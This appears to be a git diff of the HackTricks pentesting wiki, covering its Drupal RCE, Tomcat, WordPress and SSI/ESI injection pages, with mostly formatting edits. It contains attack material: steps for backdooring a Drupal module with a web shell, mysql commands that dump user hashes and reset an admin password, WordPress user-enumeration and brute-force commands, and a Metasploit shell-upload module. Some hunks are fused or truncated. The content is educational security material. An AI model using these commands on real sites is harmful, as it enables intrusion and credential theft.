+{% code overflow=/dev/null ``` +{% endcode %} ### Dump users from DB -``` +{% code overflow="wrap" %} +```bash mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users' ``` - -## References - -* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209) +{% endcode %}
@@ -149,7 +130,7 @@ Learn & practice GCP Hacking: 
 <summary>Support HackTricks</summary>
 
 * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
 * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
index 10c1bfd92ae..e645355d828 100644
--- a/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
+++ b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
@@ -40,13 +40,13 @@ curl http://drupal-site.local/node/3
 ## Install PHP Filter Module
 
 {% hint style= **`Reports`** > **`Available updates`**. 3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**. 4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**. @@ -57,24 +57,7 @@ From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/ In current versions it's no longer possible to install plugins by only having access to the web after the default installation. {% endhint %} -A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz). - -* Download the archive and extract its contents. - -``` -wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz -tar xvf captcha-8.x-1.2.tar.gz -``` - -* Create a **PHP web shell** with the contents: - -```php - -``` - -* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder. +It was possible to **download** a **module**, add a **backdoor** to it and **install** it. For example, downloading [**Trurnstile**](https://www.drupal.org/project/turnstile) module in compressed format, creating a new PHP backdoor file inside of it, allowing the accessing of the PHP file with a `.htaccess` file: ```html @@ -83,15 +66,7 @@ RewriteBase / ``` -* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive. - -```bash -mv shell.php .htaccess captcha -tar cvf captcha.tar.gz captcha/ -``` - -* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**. -* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands. +And then going to **`http://drupal.local/admin/modules/install`** to install the backdoored module and access **`/modules/turnstile/back.php`** to execute it. ## Backdooring Drupal with Configuration synchronization diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat/README.md similarity index 89% rename from network-services-pentesting/pentesting-web/tomcat.md rename to network-services-pentesting/pentesting-web/tomcat/README.md index 4806c198cb7..7bf01a0184c 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat/README.md @@ -1,8 +1,8 @@ # Tomcat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -20,7 +20,7 @@ Learn & practice GCP Hacking:
+
## Enumeration @@ -128,7 +128,7 @@ Finally, if you have access to the Tomcat Web Application Manager, you can **upl ### Limitations -You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section). +You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section). ```bash # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed @@ -277,8 +277,8 @@ Example: * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index d7966aacce8..4a54e5b48bd 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -9,7 +9,7 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -18,20 +18,21 @@ Learn & practice GCP Hacking:
\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} ## Basic Information -**Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\ -**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ -**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) +* **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt` +* **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) -In **wp-config.php** you can find the root password of the database. + * **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) -Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ + +* In **wp-config.php** you can find the root password of the database. +* Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ ### **Main WordPress Files** @@ -115,7 +116,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} @@ -128,27 +129,23 @@ You probably won't be able to find all the Plugins and Themes passible. In order ### Users -**ID Brute** - -You get valid users from a WordPress site by Brute Forcing users IDs: +* **ID Brute:** You get valid users from a WordPress site by Brute Forcing users IDs: -``` +```bash curl -s -I -X GET http://blog.example.com/?author=1 ``` If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**. -**wp-json** - -You can also try to get information about the users by querying: +* **wp-json:** You can also try to get information about the users by querying: -``` +```bash curl http://blog.example.com/wp-json/wp/v2/users ``` Another `/wp-json/` endpoint that can reveal some information about users is: -``` +```bash curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL ``` @@ -156,9 +153,7 @@ Note that this endpoint only exposes users that have made a post. **Only informa Also note that **/wp-json/wp/v2/pages** could leak IP addresses. -#### Login username enumeration - -When login in **`/wp-login.php`** the **message** is **different** is the indicated **username exists or not**. +* **Login username enumeration**: When login in **`/wp-login.php`** the **message** is **different** is the indicated **username exists or not**. ### XML-RPC @@ -252,7 +247,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * ``` -![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png) +![](../../.gitbook/assets/1_JaUYIZF8ZjDGGB7ocsZC-g.png) If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. @@ -288,13 +283,13 @@ This is the response when it doesn't work: ![](<../../.gitbook/assets/image (365).png>) -### SSRF +## SSRF {% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %} This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them. -### Automatic Tools +## Automatic Tools ```bash cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" @@ -302,14 +297,6 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec #You can try to bruteforce the admin user using wpscan with "-U admin" ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} - ## Get access by overwriting a bit More than a real attack this is a curiosity. IN the CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) you could flip 1 bit from any wordpress file. So you could flip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation. @@ -335,7 +322,7 @@ Search in internet how can you access that updated page. In this case you have t You can use: -``` +```bash use exploit/unix/webapp/wp_admin_shell_upload ``` @@ -401,15 +388,19 @@ The content includes visual aids depicting the steps in the WordPress dashboard Extract usernames and passwords: +{% code overflow="wrap" %} ```bash mysql -u --password= -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;" ``` +{% endcode %} Change admin password: +{% code overflow="wrap" %} ```bash mysql -u --password= -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;" ``` +{% endcode %} ## Wordpress Plugins Pentest @@ -489,7 +480,7 @@ Also, **only install trustable WordPress plugins and themes**.
\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} @@ -503,7 +494,7 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 18e70aa89c4..d94f7ec3acb 100644 --- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -1,15 +1,15 @@ # Server Side Inclusion/Edge Side Inclusion Injection {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -17,7 +17,7 @@ Learn & practice GCP Hacking: @@ -251,7 +254,6 @@ Check the XSLT page: * [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) * [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/) -* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304) * [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91) ## Brute-Force Detection List @@ -259,15 +261,15 @@ Check the XSLT page: {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %} {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.